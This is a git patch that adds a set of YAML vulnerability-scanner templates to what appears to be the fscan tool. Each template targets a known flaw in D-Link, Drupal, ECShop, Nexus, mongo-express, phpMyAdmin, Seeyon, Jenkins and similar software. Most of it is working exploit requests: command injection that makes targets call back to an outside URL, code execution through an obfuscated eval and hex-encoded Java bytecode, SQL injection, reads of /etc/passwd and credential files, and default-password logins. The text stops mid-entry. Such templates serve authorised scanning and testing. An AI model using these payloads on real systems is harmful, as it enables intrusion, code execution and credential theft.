From 41deddb132b2d86df6d149a8bee8f91d64b865a8 Mon Sep 17 00:00:00 2001 From: shadow1ng Date: Thu, 25 Feb 2021 19:53:58 +0800 Subject: [PATCH] =?UTF-8?q?=E4=BF=AE=E6=94=B9yaml=E8=A7=A3=E6=9E=90?= =?UTF-8?q?=E6=A8=A1=E5=9D=97,=E6=94=AF=E6=8C=81=E5=AF=86=E7=A0=81?= =?UTF-8?q?=E7=88=86=E7=A0=B4,=E5=A6=82tomcat=E5=BC=B1=E5=8F=A3=E4=BB=A4?= =?UTF-8?q?=E3=80=82yaml=E4=B8=AD=E6=96=B0=E5=A2=9Esets=E5=8F=82=E6=95=B0,?= =?UTF-8?q?=E7=B1=BB=E5=9E=8B=E4=B8=BA=E6=95=B0=E7=BB=84,=E7=94=A8?= =?UTF-8?q?=E4=BA=8E=E5=AD=98=E6=94=BE=E5=AF=86=E7=A0=81,=E5=85=B7?= =?UTF-8?q?=E4=BD=93=E7=9C=8Btomcat-manager-week.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 2 +- WebScan/pocs/dlink-cve-2019-16920-rce.yml | 19 +++++++++ WebScan/pocs/drupal-cve-2014-3704-sqli.yml | 14 +++++++ WebScan/pocs/drupal-cve-2018-7600-rce.yml | 39 +++++++++++++++++++ WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml | 13 +++++++ WebScan/pocs/ecshop-rce.yml | 27 +++++++++++++ WebScan/pocs/jenkins-cve-2018-1000600.yml | 13 +++++++ WebScan/pocs/jumpserver-unauth-rce.yml | 33 ++++++++++++++++ WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml | 12 ++++++ WebScan/pocs/laravel-debug-info-leak.yml | 11 ++++++ WebScan/pocs/laravel-improper-webdir.yml | 11 ++++++ WebScan/pocs/mongo-express-cve-2019-10758.yml | 21 ++++++++++ WebScan/pocs/nexus-cve-2019-7238.yml | 20 ++++++++++ WebScan/pocs/nexus-cve-2020-10199.yml | 21 ++++++++++ WebScan/pocs/nexus-cve-2020-10204.yml | 20 ++++++++++ WebScan/pocs/nexus-default-password.yml | 22 +++++++++++ .../pocs/phpmyadmin-setup-deserialization.yml | 13 +++++++ .../pocs/seeyon-ajax-unauthorized-access.yml | 16 ++++++++ .../pocs/seeyon-cnvd-2020-62422-readfile.yml | 11 ++++++ WebScan/pocs/sonicwall-ssl-vpn-rce.yml | 16 ++++++++ WebScan/pocs/springboot-env-unauth.yml | 15 +++++++ .../vmware-vcenter-arbitrary-file-read.yml | 18 +++++++++ ...center-unauthorized-rce-cve-2021-21972.yml | 16 ++++++++ .../wordpress-cve-2019-19985-infoleak.yml | 11 ++++++ .../wordpress-ext-adaptive-images-lfi.yml | 13 +++++++ WebScan/pocs/wordpress-ext-mailpress-rce.yml | 23 +++++++++++ WebScan/pocs/yonyou-grp-u8-sqli-to-rce.yml | 16 ++++++++ WebScan/pocs/yonyou-grp-u8-sqli.yml | 15 +++++++ 28 files changed, 480 insertions(+), 1 deletion(-) create mode 100644 WebScan/pocs/dlink-cve-2019-16920-rce.yml create mode 100644 WebScan/pocs/drupal-cve-2014-3704-sqli.yml create mode 100644 WebScan/pocs/drupal-cve-2018-7600-rce.yml create mode 100644 WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml create mode 100644 WebScan/pocs/ecshop-rce.yml create mode 100644 WebScan/pocs/jenkins-cve-2018-1000600.yml create mode 100644 WebScan/pocs/jumpserver-unauth-rce.yml create mode 100644 WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml create mode 100644 WebScan/pocs/laravel-debug-info-leak.yml create mode 100644 WebScan/pocs/laravel-improper-webdir.yml create mode 100644 WebScan/pocs/mongo-express-cve-2019-10758.yml create mode 100644 WebScan/pocs/nexus-cve-2019-7238.yml create mode 100644 WebScan/pocs/nexus-cve-2020-10199.yml create mode 100644 WebScan/pocs/nexus-cve-2020-10204.yml create mode 100644 WebScan/pocs/nexus-default-password.yml create mode 100644 WebScan/pocs/phpmyadmin-setup-deserialization.yml create mode 100644 WebScan/pocs/seeyon-ajax-unauthorized-access.yml create mode 100644 WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml create mode 100644 WebScan/pocs/sonicwall-ssl-vpn-rce.yml create mode 100644 WebScan/pocs/springboot-env-unauth.yml create mode 100644 WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml create mode 100644 WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml create mode 100644 WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml create mode 100644 WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml create mode 100644 WebScan/pocs/wordpress-ext-mailpress-rce.yml create mode 100644 WebScan/pocs/yonyou-grp-u8-sqli-to-rce.yml create mode 100644 WebScan/pocs/yonyou-grp-u8-sqli.yml diff --git a/README.md b/README.md index 88cdadd..ed77cdf 100644 --- a/README.md +++ b/README.md @@ -14,7 +14,7 @@ 因为用习惯了f-scrack,习惯一条命令跑完所有模块,省去一个个模块单独调用的时间,当然我附加了-m 指定模块的功能。 ## 最近更新 -[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml +[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml [+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。 [+] 2021/2/5 修改icmp发包模式,更适合大规模探测。 修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度 diff --git a/WebScan/pocs/dlink-cve-2019-16920-rce.yml b/WebScan/pocs/dlink-cve-2019-16920-rce.yml new file mode 100644 index 0000000..8df53e7 --- /dev/null +++ b/WebScan/pocs/dlink-cve-2019-16920-rce.yml @@ -0,0 +1,19 @@ +name: poc-yaml-dlink-cve-2019-16920-rce +set: + reverse: newReverse() + reverseURL: reverse.url +rules: + - method: POST + path: /apply_sec.cgi + headers: + Content-Type: application/x-www-form-urlencoded + body: >- + html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}} + follow_redirects: true + expression: | + response.status == 200 && reverse.wait(5) +detail: + author: JingLing(https://hackfun.org/) + links: + - https://www.anquanke.com/post/id/187923 + - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3 diff --git a/WebScan/pocs/drupal-cve-2014-3704-sqli.yml b/WebScan/pocs/drupal-cve-2014-3704-sqli.yml new file mode 100644 index 0000000..87d6939 --- /dev/null +++ b/WebScan/pocs/drupal-cve-2014-3704-sqli.yml @@ -0,0 +1,14 @@ +name: poc-yaml-drupal-cve-2014-3704-sqli +rules: + - method: POST + path: /?q=node&destination=node + body: >- + pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or + updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a + follow_redirects: false + expression: | + response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53") +detail: + Affected Version: "Drupal < 7.32" + links: + - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704 \ No newline at end of file diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce.yml b/WebScan/pocs/drupal-cve-2018-7600-rce.yml new file mode 100644 index 0000000..5697049 --- /dev/null +++ b/WebScan/pocs/drupal-cve-2018-7600-rce.yml @@ -0,0 +1,39 @@ +name: poc-yaml-drupal-cve-2018-7600-rce +set: + r1: randomLowercase(4) + r2: randomLowercase(4) +groups: + drupal8: + - method: POST + path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} + expression: | + response.body.bcontains(bytes(r1 + "%" + r2)) + drupal7: + - method: POST + path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password + search: | + name="form_build_id"\s+value="(?P.+?)" + expression: | + response.status == 200 + - method: POST + path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_build_id={{build_id}} + expression: | + response.body.bcontains(bytes(r1 + "%" + r2)) +detail: + links: + - https://github.com/dreadlocked/Drupalgeddon2 + - https://paper.seebug.org/567/ +test: + target: http://cve-2018-7600-8-x.vulnet:8080/ diff --git a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml b/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml new file mode 100644 index 0000000..0b7721c --- /dev/null +++ b/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml @@ -0,0 +1,13 @@ +name: poc-yaml-ecshop-cnvd-2020-58823-sqli +set: + r1: randomInt(40000, 44800) +rules: + - method: POST + path: /delete_cart_goods.php + body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) + expression: | + response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) +detail: + author: 凉风(http://webkiller.cn/) + links: + - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw \ No newline at end of file diff --git a/WebScan/pocs/ecshop-rce.yml b/WebScan/pocs/ecshop-rce.yml new file mode 100644 index 0000000..acaa0a0 --- /dev/null +++ b/WebScan/pocs/ecshop-rce.yml @@ -0,0 +1,27 @@ +name: poc-yaml-ecshop-rce +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +groups: + 2.x: + - method: POST + path: /user.php + headers: + Referer: >- + 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca + Content-Type: application/x-www-form-urlencoded + body: action=login&pp123=printf({{r1}}*{{r2}}); + expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) + 3.x: + - method: POST + path: /user.php + headers: + Referer: >- + 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads + Content-Type: application/x-www-form-urlencoded + body: action=login&pp123=printf({{r1}}*{{r2}}); + expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + author: 凉风(http://webkiller.cn/) + links: + - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/jenkins-cve-2018-1000600.yml b/WebScan/pocs/jenkins-cve-2018-1000600.yml new file mode 100644 index 0000000..663f427 --- /dev/null +++ b/WebScan/pocs/jenkins-cve-2018-1000600.yml @@ -0,0 +1,13 @@ +name: poc-yaml-jenkins-cve-2018-1000600 +set: + reverse: newReverse() + reverseUrl: reverse.url +rules: + - method: GET + path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}} + expression: | + response.status == 200 && reverse.wait(5) +detail: + author: PickledFish(https://github.com/PickledFish) + links: + - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ diff --git a/WebScan/pocs/jumpserver-unauth-rce.yml b/WebScan/pocs/jumpserver-unauth-rce.yml new file mode 100644 index 0000000..36d9752 --- /dev/null +++ b/WebScan/pocs/jumpserver-unauth-rce.yml @@ -0,0 +1,33 @@ +name: poc-yaml-jumpserver-unauth-rce +set: + r1: randomLowercase(5) +groups: + users: + - method: GET + path: /api/v1/users/connection-token/ + follow_redirects: false + expression: | + response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") + - method: GET + path: /api/v1/users/connection-token/?user-only={{r1}} + follow_redirects: false + expression: | + response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") + authentication: + - method: GET + path: /api/v1/authentication/connection-token/ + follow_redirects: false + expression: | + response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") + - method: GET + path: /api/v1/authentication/connection-token/?user-only={{r1}} + follow_redirects: false + expression: | + response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") +detail: + author: mvhz81 + info: jumpserver unauth read logfile + jumpserver rce + links: + - https://s.tencent.com/research/bsafe/1228.html + - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw + - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh diff --git a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml b/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml new file mode 100644 index 0000000..b4c8a72 --- /dev/null +++ b/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml @@ -0,0 +1,12 @@ +name: poc-yaml-lanproxy-cve-2021-3019-lfi +rules: + - method: GET + path: "/../conf/config.properties" + expression: | + response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream") +detail: + author: pa55w0rd(www.pa55w0rd.online/) + Affected Version: "lanproxy 0.1" + links: + - https://github.com/ffay/lanproxy/issues/152 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019 diff --git a/WebScan/pocs/laravel-debug-info-leak.yml b/WebScan/pocs/laravel-debug-info-leak.yml new file mode 100644 index 0000000..aa5610e --- /dev/null +++ b/WebScan/pocs/laravel-debug-info-leak.yml @@ -0,0 +1,11 @@ +name: poc-yaml-laravel-debug-info-leak +rules: + - method: POST + path: / + follow_redirects: false + expression: > + response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php")) +detail: + author: Dem0ns (https://github.com/dem0ns) + links: + - https://github.com/dem0ns/improper/tree/master/laravel/5_debug diff --git a/WebScan/pocs/laravel-improper-webdir.yml b/WebScan/pocs/laravel-improper-webdir.yml new file mode 100644 index 0000000..d1db0b5 --- /dev/null +++ b/WebScan/pocs/laravel-improper-webdir.yml @@ -0,0 +1,11 @@ +name: poc-yaml-laravel-improper-webdir +rules: + - method: GET + path: /storage/logs/laravel.log + follow_redirects: false + expression: > + response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace")) +detail: + author: Dem0ns (https://github.com/dem0ns) + links: + - https://github.com/dem0ns/improper diff --git a/WebScan/pocs/mongo-express-cve-2019-10758.yml b/WebScan/pocs/mongo-express-cve-2019-10758.yml new file mode 100644 index 0000000..6d64293 --- /dev/null +++ b/WebScan/pocs/mongo-express-cve-2019-10758.yml @@ -0,0 +1,21 @@ +name: poc-yaml-mongo-express-cve-2019-10758 +set: + reverse: newReverse() + reverseURL: reverse.url +rules: + - method: POST + path: /checkValid + headers: + Authorization: Basic YWRtaW46cGFzcw== + body: >- + document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}') + follow_redirects: true + expression: > + reverse.wait(5) +detail: + vulnpath: '/checkValid' + author: fnmsd(https://github.com/fnmsd) + description: 'Mongo Express CVE-2019-10758 Code Execution' + links: + - https://github.com/masahiro331/CVE-2019-10758 + - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html \ No newline at end of file diff --git a/WebScan/pocs/nexus-cve-2019-7238.yml b/WebScan/pocs/nexus-cve-2019-7238.yml new file mode 100644 index 0000000..69d5bc4 --- /dev/null +++ b/WebScan/pocs/nexus-cve-2019-7238.yml @@ -0,0 +1,20 @@ +name: poc-yaml-nexus-cve-2019-7238 +set: + r1: randomInt(800000000, 1000000000) + r2: randomInt(800000000, 1000000000) +rules: + - method: POST + path: "/service/extdirect" + headers: + Content-Type: application/json + body: | + {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'expr {{r1}} + {{r2}}');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 + r2))) +detail: + Affected Version: "nexus<3.15" + author: hanxiansheng26(https://github.com/hanxiansheng26) + links: + - https://github.com/jas502n/CVE-2019-7238 + - https://github.com/verctor/nexus_rce_CVE-2019-7238 + - https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2019-7238 diff --git a/WebScan/pocs/nexus-cve-2020-10199.yml b/WebScan/pocs/nexus-cve-2020-10199.yml new file mode 100644 index 0000000..7ce9fa7 --- /dev/null +++ b/WebScan/pocs/nexus-cve-2020-10199.yml @@ -0,0 +1,21 @@ +name: poc-yaml-nexus-cve-2020-10199 +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +rules: + - method: POST + path: "/rest/beta/repositories/go/group" + headers: + Content-Type: application/json + body: | + {"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}} + expression: | + response.status == 400 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + Affected Version: "nexus<3.21.2" + author: kingkk(https://www.kingkk.com/) + links: + - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb + - https://www.cnblogs.com/magic-zero/p/12641068.html + - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype + - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-cve-2020-10204.yml b/WebScan/pocs/nexus-cve-2020-10204.yml new file mode 100644 index 0000000..a08a2bb --- /dev/null +++ b/WebScan/pocs/nexus-cve-2020-10204.yml @@ -0,0 +1,20 @@ +name: poc-yaml-nexus-cve-2020-10204 +set: + r1: randomInt(40000, 44800) + r2: randomInt(40000, 44800) +rules: + - method: POST + path: "/extdirect" + headers: + Content-Type: application/json + body: | + {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28} + expression: | + response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +detail: + Affected Version: "nexus<3.21.2" + author: kingkk(https://www.kingkk.com/) + links: + - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb + - https://www.cnblogs.com/magic-zero/p/12641068.html + - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31 diff --git a/WebScan/pocs/nexus-default-password.yml b/WebScan/pocs/nexus-default-password.yml new file mode 100644 index 0000000..5a27c24 --- /dev/null +++ b/WebScan/pocs/nexus-default-password.yml @@ -0,0 +1,22 @@ +name: poc-yaml-nexus-default-password +rules: + - method: GET + path: /nexus/service/siesta/capabilities + expression: > + response.status == 401 + - method: GET + path: /nexus/service/local/authentication/login + headers: + Accept: application/json + Authorization: Basic YWRtaW46YWRtaW4xMjM= + expression: > + response.status == 200 + - method: GET + path: /nexus/service/siesta/capabilities + expression: > + response.status == 200 +detail: + author: Soveless(https://github.com/Soveless) + Affected Version: "Nexus Repository Manager OSS" + links: + - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager \ No newline at end of file diff --git a/WebScan/pocs/phpmyadmin-setup-deserialization.yml b/WebScan/pocs/phpmyadmin-setup-deserialization.yml new file mode 100644 index 0000000..7bf691e --- /dev/null +++ b/WebScan/pocs/phpmyadmin-setup-deserialization.yml @@ -0,0 +1,13 @@ +name: poc-yaml-phpmyadmin-setup-deserialization +rules: + - method: POST + path: /scripts/setup.php + body: >- + action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} + follow_redirects: false + expression: >- + response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) +detail: + author: p0wd3r + links: + - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 diff --git a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml b/WebScan/pocs/seeyon-ajax-unauthorized-access.yml new file mode 100644 index 0000000..92ce028 --- /dev/null +++ b/WebScan/pocs/seeyon-ajax-unauthorized-access.yml @@ -0,0 +1,16 @@ +name: poc-yaml-seeyon-ajax-unauthorized-access +rules: + - method: GET + path: /seeyon/thirdpartyController.do.css/..;/ajax.do + expression: | + response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) + - method: GET + path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile + expression: | + response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json") + +detail: + author: x1n9Qi8 + links: + - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA + - https://buaq.net/go-53721.html diff --git a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml b/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml new file mode 100644 index 0000000..f6373ff --- /dev/null +++ b/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml @@ -0,0 +1,11 @@ +name: poc-yaml-seeyon-cnvd-2020-62422-readfile +rules: + - method: GET + path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties + follow_redirects: false + expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") +detail: + author: Aquilao(https://github.com/Aquilao) + info: seeyon readfile(CNVD-2020-62422) + links: + - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 diff --git a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml b/WebScan/pocs/sonicwall-ssl-vpn-rce.yml new file mode 100644 index 0000000..4b00104 --- 